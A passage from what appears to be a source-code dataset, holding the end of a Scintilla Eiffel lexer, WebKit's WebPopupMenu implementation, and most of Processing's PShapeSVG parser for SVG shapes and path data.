styler[i + j];\r\n\t\t\t\tj++;\r\n\t\t\t}\r\n\t\t\ts[j] = '\\0';\r\n\r\n\t\t\tif (\r\n\t\t\t\t(strcmp(s, \"check\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"debug\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"deferred\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"do\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"from\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"if\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"inspect\") == 0) ||\r\n\t\t\t\t(strcmp(s, \"once\") == 0)\r\n\t\t\t)\r\n\t\t\t\tlevelCurrent++;\r\n\t\t\tif (!lastDeferred && (strcmp(s, \"class\") == 0))\r\n\t\t\t\tlevelCurrent++;\r\n\t\t\tif (strcmp(s, \"end\") == 0)\r\n\t\t\t\tlevelCurrent--;\r\n\t\t\tlastDeferred = strcmp(s, \"deferred\") == 0;\r\n\t\t}\r\n\r\n\t\tif (atEOL) {\r\n\t\t\tint lev = levelPrev;\r\n\t\t\tif (visibleChars == 0)\r\n\t\t\t\tlev |= SC_FOLDLEVELWHITEFLAG;\r\n\t\t\tif ((levelCurrent > levelPrev) && (visibleChars > 0))\r\n\t\t\t\tlev |= SC_FOLDLEVELHEADERFLAG;\r\n\t\t\tif (lev != styler.LevelAt(lineCurrent)) {\r\n\t\t\t\tstyler.SetLevel(lineCurrent, lev);\r\n\t\t\t}\r\n\t\t\tlineCurrent++;\r\n\t\t\tlevelPrev = levelCurrent;\r\n\t\t\tvisibleChars = 0;\r\n\t\t}\r\n\t\tif (!isspacechar(ch))\r\n\t\t\tvisibleChars++;\r\n\t\tstylePrev = style;\r\n\t}\r\n\t// Fill in the real level of the next line, keeping the current flags as they will be filled in later\r\n\tint flagsNext = styler.LevelAt(lineCurrent) & ~SC_FOLDLEVELNUMBERMASK;\r\n\tstyler.SetLevel(lineCurrent, levelPrev | flagsNext);\r\n}\r\n\r\nstatic const char * const eiffelWordListDesc[] = {\r\n\t\"Keywords\",\r\n\t0\r\n};\r\n\r\nLexerModule lmEiffel(SCLEX_EIFFEL, ColouriseEiffelDoc, \"eiffel\", FoldEiffelDocIndent, eiffelWordListDesc);\r\nLexerModule lmEiffelkw(SCLEX_EIFFELKW, ColouriseEiffelDoc, \"eiffelkw\", FoldEiffelDocKeyWords, eiffelWordListDesc);\r\n"} {"text": "/*\n * Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).\n * Copyright (C) 2010 Apple Inc. All rights reserved.\n *\n * This library is free software; you can redistribute it and/or\n * modify it under the terms of the GNU Library General Public\n * License as published by the Free Software Foundation; either\n * version 2 of the License, or (at your option) any later version.\n *\n * This library is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n * Library General Public License for more details.\n *\n * You should have received a copy of the GNU Library General Public License\n * along with this library; see the file COPYING.LIB. If not, write to\n * the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,\n * Boston, MA 02110-1301, USA.\n *\n */\n\n#include \"config.h\"\n#include \"WebPopupMenu.h\"\n\n#include \"PlatformPopupMenuData.h\"\n#include \"WebCoreArgumentCoders.h\"\n#include \"WebPage.h\"\n#include \"WebPageProxyMessages.h\"\n#include \"WebProcess.h\"\n#include \n#include \n\nusing namespace WebCore;\n\nnamespace WebKit {\n\nRef WebPopupMenu::create(WebPage* page, PopupMenuClient* client)\n{\n return adoptRef(*new WebPopupMenu(page, client));\n}\n\nWebPopupMenu::WebPopupMenu(WebPage* page, PopupMenuClient* client)\n : m_popupClient(client)\n , m_page(page)\n{\n}\n\nWebPopupMenu::~WebPopupMenu()\n{\n}\n\nvoid WebPopupMenu::disconnectClient()\n{\n m_popupClient = 0;\n}\n\nvoid WebPopupMenu::didChangeSelectedIndex(int newIndex)\n{\n if (!m_popupClient)\n return;\n\n m_popupClient->popupDidHide();\n if (newIndex >= 0)\n m_popupClient->valueChanged(newIndex);\n}\n\nvoid WebPopupMenu::setTextForIndex(int index)\n{\n if (!m_popupClient)\n return;\n\n m_popupClient->setTextFromItem(index);\n}\n\nVector WebPopupMenu::populateItems()\n{\n size_t size = m_popupClient->listSize();\n\n Vector items;\n items.reserveInitialCapacity(size);\n \n for (size_t i = 0; i < size; ++i) {\n if (m_popupClient->itemIsSeparator(i))\n items.append(WebPopupItem(WebPopupItem::Separator));\n else {\n // FIXME: Add support for styling the font.\n // FIXME: Add support for styling the foreground and background colors.\n // FIXME: Find a way to customize text color when an item is highlighted.\n PopupMenuStyle itemStyle = m_popupClient->itemStyle(i);\n items.append(WebPopupItem(WebPopupItem::Item, m_popupClient->itemText(i), itemStyle.textDirection(), itemStyle.hasTextDirectionOverride(), m_popupClient->itemToolTip(i), m_popupClient->itemAccessibilityText(i), m_popupClient->itemIsEnabled(i), m_popupClient->itemIsLabel(i), m_popupClient->itemIsSelected(i)));\n }\n }\n\n return items;\n}\n\nvoid WebPopupMenu::show(const IntRect& rect, FrameView* view, int index)\n{\n // FIXME: We should probably inform the client to also close the menu.\n Vector items = populateItems();\n\n if (items.isEmpty() || !m_page) {\n m_popupClient->popupDidHide();\n return;\n }\n\n m_page->setActivePopupMenu(this);\n\n // Move to page coordinates\n IntRect pageCoordinates(view->contentsToWindow(rect.location()), rect.size());\n\n PlatformPopupMenuData platformData;\n setUpPlatformData(pageCoordinates, platformData);\n\n WebProcess::singleton().parentProcessConnection()->send(Messages::WebPageProxy::ShowPopupMenu(pageCoordinates, m_popupClient->menuStyle().textDirection(), items, index, platformData), m_page->pageID());\n}\n\nvoid WebPopupMenu::hide()\n{\n if (!m_page || !m_popupClient)\n return;\n\n WebProcess::singleton().parentProcessConnection()->send(Messages::WebPageProxy::HidePopupMenu(), m_page->pageID());\n m_page->setActivePopupMenu(0);\n}\n\nvoid WebPopupMenu::updateFromElement()\n{\n}\n\n} // namespace WebKit\n"} {"text": "/* -*- mode: java; c-basic-offset: 2; indent-tabs-mode: nil -*- */\n\n/*\n Part of the Processing project - http://processing.org\n\n Copyright (c) 2012-19 The Processing Foundation\n Copyright (c) 2006-12 Ben Fry and Casey Reas\n Copyright (c) 2004-06 Michael Chang\n\n This library is free software; you can redistribute it and/or\n modify it under the terms of the GNU Lesser General Public\n License version 2.1 as published by the Free Software Foundation.\n\n This library is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n Lesser General Public License for more details.\n\n You should have received a copy of the GNU Lesser General\n Public License along with this library; if not, write to the\n Free Software Foundation, Inc., 59 Temple Place, Suite 330,\n Boston, MA 02111-1307 USA\n*/\n\npackage processing.core;\n\n//import static java.awt.Font.BOLD;\n//import static java.awt.Font.ITALIC;\n//import static java.awt.Font.PLAIN;\nimport processing.data.*;\n\n// TODO replace these with PMatrix2D\nimport android.graphics.Matrix;\n//import java.awt.geom.AffineTransform;\n//import java.awt.geom.Point2D;\n\nimport java.util.Map;\nimport java.util.HashMap;\nimport java.util.regex.Matcher;\nimport java.util.regex.Pattern;\n\n\n/**\n * This class is not part of the Processing API and should not be used\n * directly. Instead, use loadShape() and methods like it, which will make\n * use of this class. Using this class directly will cause your code to break\n * when combined with future versions of Processing.\n *

\n * SVG stands for Scalable Vector Graphics, a portable graphics format.\n * It is a vector format so it allows for \"infinite\" resolution and relatively\n * small file sizes. Most modern media software can view SVG files, including\n * Adobe products, Firefox, etc. Illustrator and Inkscape can edit SVG files.\n * View the SVG specification here.\n *

\n * We have no intention of turning this into a full-featured SVG library.\n * The goal of this project is a basic shape importer that originally was small\n * enough to be included with applets, meaning that its download size should be\n * in the neighborhood of 25-30 Kb. Though we're far less limited nowadays on\n * size constraints, we remain extremely limited in terms of time, and do not\n * have volunteers who are available to maintain a larger SVG library.\n *

\n * For more sophisticated import/export, consider the\n * Batik\n * library from the Apache Software Foundation.\n *

\n * Batik is used in the SVG Export library in Processing 3, however using it\n * for full SVG import is still a considerable amount of work. Wiring it to\n * Java2D wouldn't be too bad, but using it with OpenGL, JavaFX, and features\n * like begin/endRecord() and begin/endRaw() would be considerable effort.\n *

\n * Future improvements to this library may focus on this properly supporting\n * a specific subset of SVG, for instance the simpler SVG profiles known as\n * SVG Tiny or Basic,\n * although we still would not support the interactivity options.\n *\n *


\n *\n * A minimal example program using SVG:\n * (assuming a working moo.svg is in your data folder)\n *\n *

\n * PShape moo;\n *\n * void setup() {\n *   size(400, 400);\n *   moo = loadShape(\"moo.svg\");\n * }\n * void draw() {\n *   background(255);\n *   shape(moo, mouseX, mouseY);\n * }\n * 
\n */\npublic class PShapeSVG extends PShape {\n XML element;\n\n /// Values between 0 and 1.\n protected float opacity;\n float strokeOpacity;\n float fillOpacity;\n\n /** Width of containing SVG (used for percentages). */\n protected float svgWidth;\n\n /** Height of containing SVG (used for percentages). */\n protected float svgHeight;\n\n /** √((w² + h²)/2) of containing SVG (used for percentages). */\n protected float svgSizeXY;\n\n protected Gradient strokeGradient;\n String strokeName; // id of another object, gradients only?\n\n protected Gradient fillGradient;\n String fillName; // id of another object\n\n\n /**\n * Initializes a new SVG object from the given XML object.\n */\n public PShapeSVG(XML svg) {\n this(null, svg, true);\n\n if (!svg.getName().equals(\"svg\")) {\n if (svg.getName().toLowerCase().equals(\"html\")) {\n // Common case is that files aren't downloaded properly\n throw new RuntimeException(\"This appears to be a web page, not an SVG file.\");\n } else {\n throw new RuntimeException(\"The root node is not , it's <\" + svg.getName() + \">\");\n }\n }\n }\n\n\n protected PShapeSVG(PShapeSVG parent, XML properties, boolean parseKids) {\n setParent(parent);\n\n // Need to get width/height in early.\n if (properties.getName().equals(\"svg\")) {\n String unitWidth = properties.getString(\"width\");\n String unitHeight = properties.getString(\"height\");\n\n // Can't handle width/height as percentages easily. I'm just going\n // to put in 100 as a dummy value, beacuse this means that it will\n // come out as a reasonable value.\n if (unitWidth != null) width = parseUnitSize(unitWidth, 100);\n if (unitHeight != null) height = parseUnitSize(unitHeight, 100);\n\n String viewBoxStr = properties.getString(\"viewBox\");\n if (viewBoxStr != null) {\n float[] viewBox = PApplet.parseFloat(PApplet.splitTokens(viewBoxStr));\n if (unitWidth == null || unitHeight == null) {\n // Not proper parsing of the viewBox, but will cover us for cases where\n // the width and height of the object is not specified.\n width = viewBox[2];\n height = viewBox[3];\n } else {\n // http://www.w3.org/TR/SVG/coords.html#ViewBoxAttribute\n // TODO: preserveAspectRatio.\n if (matrix == null) matrix = new PMatrix2D();\n matrix.scale(width/viewBox[2], height/viewBox[3]);\n matrix.translate(-viewBox[0], -viewBox[1]);\n }\n }\n\n // Negative size is illegal.\n if (width < 0 || height < 0)\n throw new RuntimeException(\": width (\" + width +\n \") and height (\" + height + \") must not be negative.\");\n\n // It's technically valid to have width or height == 0. Not specified at\n // all is what to test for.\n if ((unitWidth == null || unitHeight == null) && viewBoxStr == null) {\n //throw new RuntimeException(\"width/height not specified\");\n PGraphics.showWarning(\"The width and/or height is not \" +\n \"readable in the tag of this file.\");\n // For the spec, the default is 100% and 100%. For purposes\n // here, insert a dummy value because this is prolly just a\n // font or something for which the w/h doesn't matter.\n width = 1;\n height = 1;\n }\n\n svgWidth = width;\n svgHeight = height;\n svgSizeXY = PApplet.sqrt((svgWidth*svgWidth + svgHeight*svgHeight)/2.0f);\n }\n\n element = properties;\n name = properties.getString(\"id\");\n // @#$(* adobe illustrator mangles names of objects when re-saving\n if (name != null) {\n while (true) {\n String[] m = PApplet.match(name, \"_x([A-Za-z0-9]{2})_\");\n if (m == null) break;\n char repair = (char) PApplet.unhex(m[1]);\n name = name.replace(m[0], \"\" + repair);\n }\n }\n\n String displayStr = properties.getString(\"display\", \"inline\");\n visible = !displayStr.equals(\"none\");\n\n String transformStr = properties.getString(\"transform\");\n if (transformStr != null) {\n if (matrix == null) {\n matrix = parseTransform(transformStr);\n } else {\n matrix.preApply(parseTransform(transformStr));\n }\n }\n\n if (parseKids) {\n parseColors(properties);\n parseChildren(properties);\n }\n }\n\n\n // Broken out so that subclasses can copy any additional variables\n // (i.e. fillGradientPaint and strokeGradientPaint)\n protected void setParent(PShapeSVG parent) {\n // Need to set this so that findChild() works.\n // Otherwise 'parent' is null until addChild() is called later.\n this.parent = parent;\n\n if (parent == null) {\n // set values to their defaults according to the SVG spec\n stroke = false;\n strokeColor = 0xff000000;\n strokeWeight = 1;\n strokeCap = PConstants.SQUARE; // equivalent to BUTT in svg spec\n strokeJoin = PConstants.MITER;\n strokeGradient = null;\n// strokeGradientPaint = null;\n strokeName = null;\n\n fill = true;\n fillColor = 0xff000000;\n fillGradient = null;\n// fillGradientPaint = null;\n fillName = null;\n\n //hasTransform = false;\n //transformation = null; //new float[] { 1, 0, 0, 1, 0, 0 };\n\n // svgWidth, svgHeight, and svgXYSize done below.\n\n strokeOpacity = 1;\n fillOpacity = 1;\n opacity = 1;\n\n } else {\n stroke = parent.stroke;\n strokeColor = parent.strokeColor;\n strokeWeight = parent.strokeWeight;\n strokeCap = parent.strokeCap;\n strokeJoin = parent.strokeJoin;\n strokeGradient = parent.strokeGradient;\n// strokeGradientPaint = parent.strokeGradientPaint;\n strokeName = parent.strokeName;\n\n fill = parent.fill;\n fillColor = parent.fillColor;\n fillGradient = parent.fillGradient;\n// fillGradientPaint = parent.fillGradientPaint;\n fillName = parent.fillName;\n\n svgWidth = parent.svgWidth;\n svgHeight = parent.svgHeight;\n svgSizeXY = parent.svgSizeXY;\n\n opacity = parent.opacity;\n }\n\n // The rect and ellipse modes are set to CORNER since it is the expected\n // mode for svg shapes.\n rectMode = CORNER;\n ellipseMode = CORNER;\n }\n\n\n /** Factory method for subclasses. */\n protected PShapeSVG createShape(PShapeSVG parent, XML properties, boolean parseKids) {\n return new PShapeSVG(parent, properties, parseKids);\n }\n\n\n protected void parseChildren(XML graphics) {\n XML[] elements = graphics.getChildren();\n children = new PShape[elements.length];\n childCount = 0;\n\n for (XML elem : elements) {\n PShape kid = parseChild(elem);\n if (kid != null) addChild(kid);\n }\n children = (PShape[]) PApplet.subset(children, 0, childCount);\n }\n\n\n /**\n * Parse a child XML element.\n * Override this method to add parsing for more SVG elements.\n */\n protected PShape parseChild(XML elem) {\n// System.err.println(\"parsing child in pshape \" + elem.getName());\n String name = elem.getName();\n PShapeSVG shape = null;\n\n\n if (name == null) {\n // just some whitespace that can be ignored (hopefully)\n\n } else if (name.equals(\"g\")) {\n shape = createShape(this, elem, true);\n\n } else if (name.equals(\"defs\")) {\n // generally this will contain gradient info, so may\n // as well just throw it into a group element for parsing\n shape = createShape(this, elem, true);\n\n } else if (name.equals(\"line\")) {\n shape = createShape(this, elem, true);\n shape.parseLine();\n\n } else if (name.equals(\"circle\")) {\n shape = createShape(this, elem, true);\n shape.parseEllipse(true);\n\n } else if (name.equals(\"ellipse\")) {\n shape = createShape(this, elem, true);\n shape.parseEllipse(false);\n\n } else if (name.equals(\"rect\")) {\n shape = createShape(this, elem, true);\n shape.parseRect();\n\n } else if (name.equals(\"image\")) {\n shape = createShape(this, elem, true);\n shape.parseImage();\n\n } else if (name.equals(\"polygon\")) {\n shape = createShape(this, elem, true);\n shape.parsePoly(true);\n\n } else if (name.equals(\"polyline\")) {\n shape = createShape(this, elem, true);\n shape.parsePoly(false);\n\n } else if (name.equals(\"path\")) {\n shape = createShape(this, elem, true);\n shape.parsePath();\n\n } else if (name.equals(\"radialGradient\")) {\n return new RadialGradient(this, elem);\n\n } else if (name.equals(\"linearGradient\")) {\n return new LinearGradient(this, elem);\n\n } else if (name.equals(\"font\")) {\n return new Font(this, elem);\n\n// } else if (name.equals(\"font-face\")) {\n// return new FontFace(this, elem);\n\n// } else if (name.equals(\"glyph\") || name.equals(\"missing-glyph\")) {\n// return new FontGlyph(this, elem);\n\n } else if (name.equals(\"text\")) { // || name.equals(\"font\")) {\n return new Text(this, elem);\n\n } else if (name.equals(\"tspan\")) {\n// return new LineOfText(this, elem);\n PGraphics.showWarning(\"tspan elements are not supported.\");\n\n } else if (name.equals(\"filter\")) {\n PGraphics.showWarning(\"Filters are not supported.\");\n\n } else if (name.equals(\"mask\")) {\n PGraphics.showWarning(\"Masks are not supported.\");\n\n } else if (name.equals(\"pattern\")) {\n PGraphics.showWarning(\"Patterns are not supported.\");\n\n } else if (name.equals(\"stop\")) {\n // stop tag is handled by gradient parser, so don't warn about it\n\n } else if (name.equals(\"sodipodi:namedview\")) {\n // these are always in Inkscape files, the warnings get tedious\n\n } else if (name.equals(\"metadata\")\n || name.equals(\"title\") || name.equals(\"desc\")) {\n // fontforge just stuffs in as a comment.\n // All harmless stuff, irrelevant to rendering.\n return null;\n\n } else if (!name.startsWith(\"#\")) {\n PGraphics.showWarning(\"Ignoring <\" + name + \"> tag.\");\n// new Exception().printStackTrace();\n }\n return shape;\n }\n\n\n protected void parseLine() {\n kind = LINE;\n family = PRIMITIVE;\n params = new float[] {\n getFloatWithUnit(element, \"x1\", svgWidth),\n getFloatWithUnit(element, \"y1\", svgHeight),\n getFloatWithUnit(element, \"x2\", svgWidth),\n getFloatWithUnit(element, \"y2\", svgHeight)\n };\n }\n\n\n /**\n * Handles parsing ellipse and circle tags.\n * @param circle true if this is a circle and not an ellipse\n */\n protected void parseEllipse(boolean circle) {\n kind = ELLIPSE;\n family = PRIMITIVE;\n params = new float[4];\n\n params[0] = getFloatWithUnit(element, \"cx\", svgWidth);\n params[1] = getFloatWithUnit(element, \"cy\", svgHeight);\n\n float rx, ry;\n if (circle) {\n rx = ry = getFloatWithUnit(element, \"r\", svgSizeXY);\n } else {\n rx = getFloatWithUnit(element, \"rx\", svgWidth);\n ry = getFloatWithUnit(element, \"ry\", svgHeight);\n }\n params[0] -= rx;\n params[1] -= ry;\n\n params[2] = rx*2;\n params[3] = ry*2;\n }\n\n\n protected void parseRect() {\n kind = RECT;\n family = PRIMITIVE;\n params = new float[] {\n getFloatWithUnit(element, \"x\", svgWidth),\n getFloatWithUnit(element, \"y\", svgHeight),\n getFloatWithUnit(element, \"width\", svgWidth),\n getFloatWithUnit(element, \"height\", svgHeight)\n };\n }\n\n\n protected void parseImage() {\n kind = RECT;\n textureMode = NORMAL;\n\n family = PRIMITIVE;\n params = new float[] {\n getFloatWithUnit(element, \"x\", svgWidth),\n getFloatWithUnit(element, \"y\", svgHeight),\n getFloatWithUnit(element, \"width\", svgWidth),\n getFloatWithUnit(element, \"height\", svgHeight)\n };\n\n this.imagePath = element.getString(\"xlink:href\");\n }\n\n /**\n * Parse a polyline or polygon from an SVG file.\n * Syntax defined at http://www.w3.org/TR/SVG/shapes.html#PointsBNF\n * @param close true if shape is closed (polygon), false if not (polyline)\n */\n protected void parsePoly(boolean close) {\n family = PATH;\n this.close = close;\n\n String pointsAttr = element.getString(\"points\");\n if (pointsAttr != null) {\n Pattern pattern = Pattern.compile(\"([+-]?[\\\\d]+(\\\\.[\\\\d]+)?([eE][+-][\\\\d]+)?)(,?\\\\s*)([+-]?[\\\\d]+(\\\\.[\\\\d]+)?([eE][+-][\\\\d]+)?)\");\n Matcher matcher = pattern.matcher(pointsAttr);\n vertexCount = 0;\n while (matcher.find()) {\n vertexCount++;\n }\n matcher.reset();\n vertices = new float[vertexCount][2];\n for (int i = 0; i < vertexCount; i++) {\n matcher.find();\n vertices[i][X] = Float.parseFloat(matcher.group(1));\n vertices[i][Y] = Float.parseFloat(matcher.group(5));\n }\n// String[] pointsBuffer = PApplet.splitTokens(pointsAttr);\n// vertexCount = pointsBuffer.length;\n// vertices = new float[vertexCount][2];\n// for (int i = 0; i < vertexCount; i++) {\n// String pb[] = PApplet.splitTokens(pointsBuffer[i], \", \\t\\r\\n\");\n// vertices[i][X] = Float.parseFloat(pb[0]);\n// vertices[i][Y] = Float.parseFloat(pb[1]);\n// }\n }\n }\n\n\n protected void parsePath() {\n family = PATH;\n kind = 0;\n\n String pathData = element.getString(\"d\");\n if (pathData == null || PApplet.trim(pathData).length() == 0) {\n return;\n }\n char[] pathDataChars = pathData.toCharArray();\n\n StringBuilder pathBuffer = new StringBuilder();\n boolean lastSeparate = false;\n\n for (int i = 0; i < pathDataChars.length; i++) {\n char c = pathDataChars[i];\n boolean separate = false;\n\n if (c == 'M' || c == 'm' ||\n c == 'L' || c == 'l' ||\n c == 'H' || c == 'h' ||\n c == 'V' || c == 'v' ||\n c == 'C' || c == 'c' || // beziers\n c == 'S' || c == 's' ||\n c == 'Q' || c == 'q' || // quadratic beziers\n c == 'T' || c == 't' ||\n c == 'A' || c == 'a' || // elliptical arc\n c == 'Z' || c == 'z' || // closepath\n c == ',') {\n separate = true;\n if (i != 0) {\n pathBuffer.append(\"|\");\n }\n }\n if (c == 'Z' || c == 'z') {\n separate = false;\n }\n if (c == '-' && !lastSeparate) {\n // allow for 'e' notation in numbers, e.g. 2.10e-9\n // http://dev.processing.org/bugs/show_bug.cgi?id=1408\n if (i == 0 || pathDataChars[i-1] != 'e') {\n pathBuffer.append(\"|\");\n }\n }\n if (c != ',') {\n pathBuffer.append(c); //\"\" + pathDataBuffer.charAt(i));\n }\n if (separate && c != ',' && c != '-') {\n pathBuffer.append(\"|\");\n }\n lastSeparate = separate;\n }\n\n // use whitespace constant to get rid of extra spaces and CR or LF\n String[] pathTokens =\n PApplet.splitTokens(pathBuffer.toString(), \"|\" + WHITESPACE);\n vertices = new float[pathTokens.length][2];\n vertexCodes = new int[pathTokens.length];\n\n float cx = 0;\n float cy = 0;\n int i = 0;\n\n char implicitCommand = '\\0';\n// char prevCommand = '\\0';\n boolean prevCurve = false;\n float ctrlX, ctrlY;\n // store values for closepath so that relative coords work properly\n float movetoX = 0;\n float movetoY = 0;\n\n while (i < pathTokens.length) {\n char c = pathTokens[i].charAt(0);\n if (((c >= '0' && c <= '9') || (c == '-')) && implicitCommand != '\\0') {\n c = implicitCommand;\n i--;\n } else {\n implicitCommand = c;\n }\n switch (c) {\n\n case 'M': // M - move to (absolute)\n cx = PApplet.parseFloat(pathTokens[i + 1]);\n cy = PApplet.parseFloat(pathTokens[i + 2]);\n movetoX = cx;\n movetoY = cy;\n parsePathMoveto(cx, cy);\n implicitCommand = 'L';\n i += 3;\n break;\n\n case 'm': // m - move to (relative)\n cx = cx + PApplet.parseFloat(pathTokens[i + 1]);\n cy = cy + PApplet.parseFloat(pathTokens[i + 2]);\n movetoX = cx;\n movetoY = cy;\n parsePathMoveto(cx, cy);\n implicitCommand = 'l';\n i += 3;\n break;\n\n case 'L':\n cx = PApplet.parseFloat(pathTokens[i + 1]);\n cy = PApplet.parseFloat(pathTokens[i + 2]);\n parsePathLineto(cx, cy);\n i += 3;\n break;\n\n case 'l':\n cx = cx + PApplet.parseFloat(pathTokens[i + 1]);\n cy = cy + PApplet.parseFloat(pathTokens[i + 2]);\n parsePathLineto(cx, cy);\n i += 3;\n break;\n\n // horizontal lineto absolute\n case 'H':\n cx = PApplet.parseFloat(pathTokens[i + 1]);\n parsePathLineto(cx, cy);\n i += 2;\n break;\n\n // horizontal lineto relative\n case 'h':\n cx = cx + PApplet.parseFloat(pathTokens[i + 1]);\n parsePathLineto(cx, cy);\n i += 2;\n break;\n\n case 'V':\n cy = PApplet.parseFloat(pathTokens[i + 1]);\n parsePathLineto(cx, cy);\n i += 2;\n break;\n\n case 'v':\n cy = cy + PApplet.parseFloat(pathTokens[i + 1]);\n parsePathLineto(cx, cy);\n i += 2;\n break;\n\n // C - curve to (absolute)\n case 'C': {\n float ctrlX1 = PApplet.parseFloat(pathTokens[i + 1]);\n float ctrlY1 = PApplet.parseFloat(pathTokens[i + 2]);\n float ctrlX2 = PApplet.parseFloat(pathTokens[i + 3]);\n float ctrlY2 = PApplet.parseFloat(pathTokens[i + 4]);\n float endX = PApplet.parseFloat(pathTokens[i + 5]);\n float endY = PApplet.parseFloat(pathTokens[i + 6]);\n parsePathCurveto(ctrlX1, ctrlY1, ctrlX2, ctrlY2, endX, endY);\n cx = endX;\n cy = endY;\n i += 7;\n prevCurve = true;\n }\n break;\n\n // c - curve to (relative)\n case 'c': {\n float ctrlX1 = cx + PApplet.parseFloat(pathTokens[i + 1]);\n float ctrlY1 = cy + PApplet.parseFloat(pathTokens[i + 2]);\n float ctrlX2 = cx + PApplet.parseFloat(pathTokens[i + 3]);\n float ctrlY2 = cy + PApplet.parseFloat(pathTokens[i + 4]);\n float endX = cx + PApplet.parseFloat(pathTokens[i + 5]);\n float endY = cy + PApplet.parseFloat(pathTokens[i + 6]);\n parsePathCurveto(ctrlX1, ctrlY1, ctrlX2, ctrlY2, endX, endY);\n cx = endX;\n cy = endY;\n i += 7;\n prevCurve = true;\n }\n break;\n\n // S - curve to shorthand (absolute)\n // Draws a cubic Bézier curve from the current point to (x,y). The first\n // control point is assumed to be the reflection of the second control\n // point on the previous command relative to the current point.\n // (x2,y2) is the second control point (i.e., the control point\n // at the end of the curve). S (uppercase) indicates that absolute\n // coordinates will follow; s (lowercase) indicates that relative\n // coordinates will follow. Multiple sets of coordinates may be specified\n // to draw a polybézier. At the end of the command, the new current point\n // becomes the final (x,y) coordinate pair used in the polybézier.\n case 'S': {\n // (If there is no previous command or if the previous command was not\n // an C, c, S or s, assume the first control point is coincident with\n // the current point.)\n if (!prevCurve) {\n ctrlX = cx;\n ctrlY = cy;\n } else {\n float ppx = vertices[vertexCount-2][X];\n float ppy = vertices[vertexCount-2][Y];\n float px = vertices[vertexCount-1][X];\n float py = vertices[vertexCount-1][Y];\n ctrlX = px + (px - ppx);\n ctrlY = py + (py - ppy);\n }\n float ctrlX2 = PApplet.parseFloat(pathTokens[i + 1]);\n float ctrlY2 = PApplet.parseFloat(pathTokens[i + 2]);\n float endX = PApplet.parseFloat(pathTokens[i + 3]);\n float endY = PApplet.parseFloat(pathTokens[i + 4]);\n parsePathCurveto(ctrlX, ctrlY, ctrlX2, ctrlY2, endX, endY);\n cx = endX;\n cy = endY;\n i += 5;\n prevCurve = true;\n }\n break;\n\n // s - curve to shorthand (relative)\n case 's': {\n if (!prevCurve) {\n ctrlX = cx;\n ctrlY = cy;\n } else {\n float ppx = vertices[vertexCount-2][X];\n float ppy = vertices[vertexCount-2][Y];\n float px = vertices[vertexCount-1][X];\n float py = vertices[vertexCount-1][Y];\n ctrlX = px + (px - ppx);\n ctrlY = py + (py - ppy);\n }\n float ctrlX2 = cx + PApplet.parseFloat(pathTokens[i + 1]);\n float ctrlY2 = cy + PApplet.parseFloat(pathTokens[i + 2]);\n float endX = cx + PApplet.parseFloat(pathTokens[i + 3]);\n float endY = cy + PApplet.parseFloat(pathTokens[i + 4]);\n parsePathCurveto(ctrlX, ctrlY, ctrlX2, ctrlY2, endX, endY);\n cx = endX;\n cy = endY;\n i += 5;\n prevCurve = true;\n }\n break;\n\n // Q - quadratic curve to (absolute)\n // Draws a quadratic Bézier curve from the current point to (x,y) using\n // (x1,y1) as the control point. Q (uppercase) indicates that absolute\n // coordinates will follow; q (lowercase) indicates that relative\n // coordinates will follow. Multiple sets of coordinates may be specified\n // to draw a polybézier. At the end of the command, the new current point\n // becomes the final (x,y) coordinate pair used in the polybézier.\n case 'Q': {\n ctrlX = PApplet.parseFloat(pathTokens[i + 1]);\n ctrlY = PApplet.parseFloat(pathTokens[i + 2]);\n float endX = PApplet.parseFloat(pathTokens[i + 3]);\n float endY = PApplet.parseFloat(pathTokens[i + 4]);\n //parsePathQuadto(cx, cy, ctrlX, ctrlY, endX, endY);\n parsePathQuadto(ctrlX, ctrlY, endX, endY);\n cx = endX;\n cy = endY;\n i += 5;\n prevCurve = true;\n }\n break;\n\n // q - quadratic curve to (relative)\n case 'q': {\n ctrlX = cx + PApplet.parseFloat(pathTokens[i + 1]);\n ctrlY = cy + PApplet.parseFloat(pathTokens[i + 2]);\n float endX = cx + PApplet.parseFloat(pathTokens[i + 3]);\n float endY = cy + PApplet.parseFloat(pathTokens[i + 4]);\n //parsePathQuadto(cx, cy, ctrlX, ctrlY, endX, endY);\n parsePathQuadto(ctrlX, ctrlY, endX, endY);\n cx = endX;\n cy = endY;\n i += 5;\n prevCurve = true;\n }\n break;\n\n // T - quadratic curveto shorthand (absolute)\n // The control point is assumed to be the reflection of the control\n // point on the previous command relative to the current point.\n case 'T': {\n // If there is no previous command or if the previous command was\n // not a Q, q, T or t, assume the control point is coincident\n // with the current point.\n if (!prevCurve) {\n ctrlX = cx;\n ctrlY = cy;\n } else {\n float ppx = vertices[vertexCount-2][X];\n float ppy = vertices[vertexCount-2][Y];\n float px = vertices[vertexCount-1][X];\n float py = vertices[vertexCount-1][Y];\n ctrlX = px + (px - ppx);\n ctrlY = py + (py - ppy);\n }\n float endX = PApplet.parseFloat(pathTokens[i + 1]);\n float endY = PApplet.parseFloat(pathTokens[i + 2]);\n //parsePathQuadto(cx, cy, ctrlX, ctrlY, endX, endY);\n parsePathQuadto(ctrlX, ctrlY, endX, endY);\n cx = endX;\n cy = endY;\n i += 3;\n prevCurve = true;\n }\n break;\n\n // t - quadratic curveto shorthand (relative)\n case 't': {\n if (!prevCurve) {\n ctrlX = cx;\n ctrlY = cy;\n } else {\n float ppx = vertices[vertexCount-2][X];\n float ppy = vertices[vertexCount-2][Y];\n float px = vertices[vertexCount-1][X];\n float py = vertices[vertexCount-1][Y];\n ctrlX = px + (px - ppx);\n ctrlY = py + (py - ppy);\n }\n float endX = cx + PApplet.parseFloat(pathTokens[i + 1]);\n float endY = cy + PApplet.parseFloat(pathTokens[i + 2]);\n //parsePathQuadto(cx, cy, ctrlX, ctrlY, endX, endY);\n parsePathQuadto(ctrlX, ctrlY, endX, endY);\n cx = endX;\n cy = endY;\n i += 3;\n prevCurve = true;\n }\n 